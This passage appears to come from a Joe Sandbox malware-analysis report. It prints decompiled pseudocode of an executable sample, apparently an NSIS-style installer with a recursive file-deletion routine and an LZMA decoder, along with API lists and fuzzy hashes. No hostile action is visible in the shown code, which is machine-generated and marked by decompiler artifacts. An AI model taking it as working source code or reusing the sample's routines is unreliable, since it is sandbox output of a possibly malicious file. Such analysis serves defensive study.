                                                                                                                                                                                                                            						__eflags = _t70 - 0xffffffff;
                                                                                                                                                                                                                            						if(_t70 == 0xffffffff) {
                                                                                                                                                                                                                            							L26:
                                                                                                                                                                                                                            							__eflags = _a4;
                                                                                                                                                                                                                            							if(_a4 != 0) {
                                                                                                                                                                                                                            								_t30 = _t66 - 2;
                                                                                                                                                                                                                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                                                                                                                                                            								__eflags =  *_t30;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                            							__eflags = _v604.cFileName - 0x2e;
                                                                                                                                                                                                                            							if(_v604.cFileName != 0x2e) {
                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                            								E00406668(_t66,  &(_v604.cFileName));
                                                                                                                                                                                                                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                            									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                                                                                                                                                                                            									__eflags = _t52;
                                                                                                                                                                                                                            									if(_t52 != 0) {
                                                                                                                                                                                                                            										E004056CA(0xfffffff2, _t68);
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										__eflags = _v8 - _t52;
                                                                                                                                                                                                                            										if(_v8 == _t52) {
                                                                                                                                                                                                                            											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											E004056CA(0xfffffff1, _t68);
                                                                                                                                                                                                                            											E00406428(_t67, _t68, 0);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                                                                            										E00405D74(__eflags, _t68, _a8);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v558;
                                                                                                                                                                                                                            							if(_v558 == 0) {
                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v558 - 0x2e;
                                                                                                                                                                                                                            							if(_v558 != 0x2e) {
                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v556;
                                                                                                                                                                                                                            							if(_v556 == 0) {
                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                            							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                                                                                                                                                            							__eflags = _t55;
                                                                                                                                                                                                                            						} while (_t55 != 0);
                                                                                                                                                                                                                            						_t38 = FindClose(_t70);
                                                                                                                                                                                                                            						goto L26;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *0x425750 - 0x5c;
                                                                                                                                                                                                                            					if( *0x425750 != 0x5c) {
                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					__eflags = _t38;
                                                                                                                                                                                                                            					if(_t38 == 0) {
                                                                                                                                                                                                                            						L28:
                                                                                                                                                                                                                            						__eflags = _a4;
                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                            							L36:
                                                                                                                                                                                                                            							return _t38;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _v12;
                                                                                                                                                                                                                            						if(_v12 != 0) {
                                                                                                                                                                                                                            							_t38 = E0040699E(_t68);
                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                            							if(_t38 == 0) {
                                                                                                                                                                                                                            								goto L36;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E00405F37(_t68);
                                                                                                                                                                                                                            							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                            							if(_t38 != 0) {
                                                                                                                                                                                                                            								return E004056CA(0xffffffe5, _t68);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _v8;
                                                                                                                                                                                                                            							if(_v8 == 0) {
                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E004056CA(0xfffffff1, _t68);
                                                                                                                                                                                                                            							return E00406428(_t67, _t68, 0);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                            						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                                                                                                                                                            						return _t38;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _t65 & 0x00000002;
                                                                                                                                                                                                                            					if((_t65 & 0x00000002) == 0) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            0x00405f2b
                                                                                                                                                                                                                            0x00405f12
                                                                                                                                                                                                                            0x00405f15
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405f1a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405f21
                                                                                                                                                                                                                            0x00405eea
                                                                                                                                                                                                                            0x00405eea
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405eea
                                                                                                                                                                                                                            0x00405dc4
                                                                                                                                                                                                                            0x00405dc7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405dc7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,7620FAA0,7620F560,00000000), ref: 00405D9D
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,7620FAA0,7620F560,00000000), ref: 00405E0E
                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,7620FAA0,7620F560,00000000), ref: 00405E1E
                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                            • String ID: .$.$PWB$\*.*
                                                                                                                                                                                                                            • API String ID: 2035342205-2468439962
                                                                                                                                                                                                                            • Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                                                                                                                                                                                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00406D5F() {
                                                                                                                                                                                                                            				unsigned short _t531;
                                                                                                                                                                                                                            				signed int _t532;
                                                                                                                                                                                                                            				void _t533;
                                                                                                                                                                                                                            				void* _t534;
                                                                                                                                                                                                                            				signed int _t535;
                                                                                                                                                                                                                            				signed int _t565;
                                                                                                                                                                                                                            				signed int _t568;
                                                                                                                                                                                                                            				signed int _t590;
                                                                                                                                                                                                                            				signed int* _t607;
                                                                                                                                                                                                                            				void* _t614;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                            					if( *(_t614 - 0x40) != 0) {
                                                                                                                                                                                                                            						 *(_t614 - 0x34) = 1;
                                                                                                                                                                                                                            						 *(_t614 - 0x84) = 7;
                                                                                                                                                                                                                            						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                                                                                                                            						L132:
                                                                                                                                                                                                                            						 *(_t614 - 0x54) = _t607;
                                                                                                                                                                                                                            						L133:
                                                                                                                                                                                                                            						_t531 =  *_t607;
                                                                                                                                                                                                                            						_t590 = _t531 & 0x0000ffff;
                                                                                                                                                                                                                            						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                                                                                                                            						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                                                                                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                                                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                                                                                                                            							 *(_t614 - 0x40) = 1;
                                                                                                                                                                                                                            							_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                                            							 *_t607 = _t532;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							 *(_t614 - 0x10) = _t565;
                                                                                                                                                                                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            							L139:
                                                                                                                                                                                                                            							_t533 =  *(_t614 - 0x84);
                                                                                                                                                                                                                            							L140:
                                                                                                                                                                                                                            							 *(_t614 - 0x88) = _t533;
                                                                                                                                                                                                                            							goto L1;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							L137:
                                                                                                                                                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(_t614 - 0x88) = 5;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                                                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							goto L139;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                                            						__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                                            						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                                            						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                                            						__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                                            						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                                            						__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                                            						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                                            						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            						if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                                            							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                                            								_t97 = __ebp - 0x38;
                                                                                                                                                                                                                            								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                                            							__ebx = 0;
                                                                                                                                                                                                                            							__ebx = 1;
                                                                                                                                                                                                                            							L60:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__edx = __ebx + __ebx;
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								_t216 = __edx + 1; // 0x1
                                                                                                                                                                                                                            								__ebx = _t216;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            								L59:
                                                                                                                                                                                                                            								if(__ebx >= 0x100) {
                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L60;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								L57:
                                                                                                                                                                                                                            								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            									 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                                            									goto L170;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            								_t202 = __ebp - 0x70;
                                                                                                                                                                                                                            								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            								goto L59;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 8);
                                                                                                                                                                                                                            							__ebx = 0;
                                                                                                                                                                                                                            							__ebx = 1;
                                                                                                                                                                                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            							L40:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                                            							 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                                            							__eax = __eax + 1;
                                                                                                                                                                                                                            							__eax = __eax << 8;
                                                                                                                                                                                                                            							__eax = __eax + __ebx;
                                                                                                                                                                                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edx;
                                                                                                                                                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            								L38:
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                            										if(__ebx >= 0x100) {
                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            										__edx = __ebx + __ebx;
                                                                                                                                                                                                                            										__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            										__esi = __edx + __eax;
                                                                                                                                                                                                                            										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            										__ax =  *__esi;
                                                                                                                                                                                                                            										 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            										__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            											__cx = __ax;
                                                                                                                                                                                                                            											_t169 = __edx + 1; // 0x1
                                                                                                                                                                                                                            											__ebx = _t169;
                                                                                                                                                                                                                            											__cx = __ax >> 5;
                                                                                                                                                                                                                            											 *__esi = __ax;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            											0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            											__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            											 *__esi = __cx;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                                                                                                                            											L45:
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t155 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                            									_t172 = __ebp - 0x34;
                                                                                                                                                                                                                            									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                            									__al =  *(__ebp - 0x44);
                                                                                                                                                                                                                            									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                                            									L55:
                                                                                                                                                                                                                            									if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            										 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                                            										goto L170;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                                            									__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                                            									__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            									 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                                            									__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                                            									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                                            									__eax = __ecx + 1;
                                                                                                                                                                                                                            									__edx = 0;
                                                                                                                                                                                                                            									_t191 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            									__edx = _t191;
                                                                                                                                                                                                                            									L79:
                                                                                                                                                                                                                            									 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                                            									L80:
                                                                                                                                                                                                                            									 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                                            									goto L1;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								if(__ebx >= 0x100) {
                                                                                                                                                                                                                            									goto L53;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L40;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								L36:
                                                                                                                                                                                                                            								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            									 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                                            									L170:
                                                                                                                                                                                                                            									_t568 = 0x22;
                                                                                                                                                                                                                            									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                                                                                                                            									_t535 = 0;
                                                                                                                                                                                                                            									L172:
                                                                                                                                                                                                                            									return _t535;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            								_t121 = __ebp - 0x70;
                                                                                                                                                                                                                            								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            								goto L38;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L1:
                                                                                                                                                                                                                            					_t534 =  *(_t614 - 0x88);
                                                                                                                                                                                                                            					if(_t534 > 0x1c) {
                                                                                                                                                                                                                            						L171:
                                                                                                                                                                                                                            						_t535 = _t534 | 0xffffffff;
                                                                                                                                                                                                                            						goto L172;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                                                                                                                                                            						case 0:
                                                                                                                                                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                                                            							_t534 =  *( *(_t614 - 0x70));
                                                                                                                                                                                                                            							if(_t534 > 0xe1) {
                                                                                                                                                                                                                            								goto L171;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                                                            							_push(0x2d);
                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                            							_pop(_t570);
                                                                                                                                                                                                                            							_push(9);
                                                                                                                                                                                                                            							_pop(_t571);
                                                                                                                                                                                                                            							_t610 = _t538 / _t570;
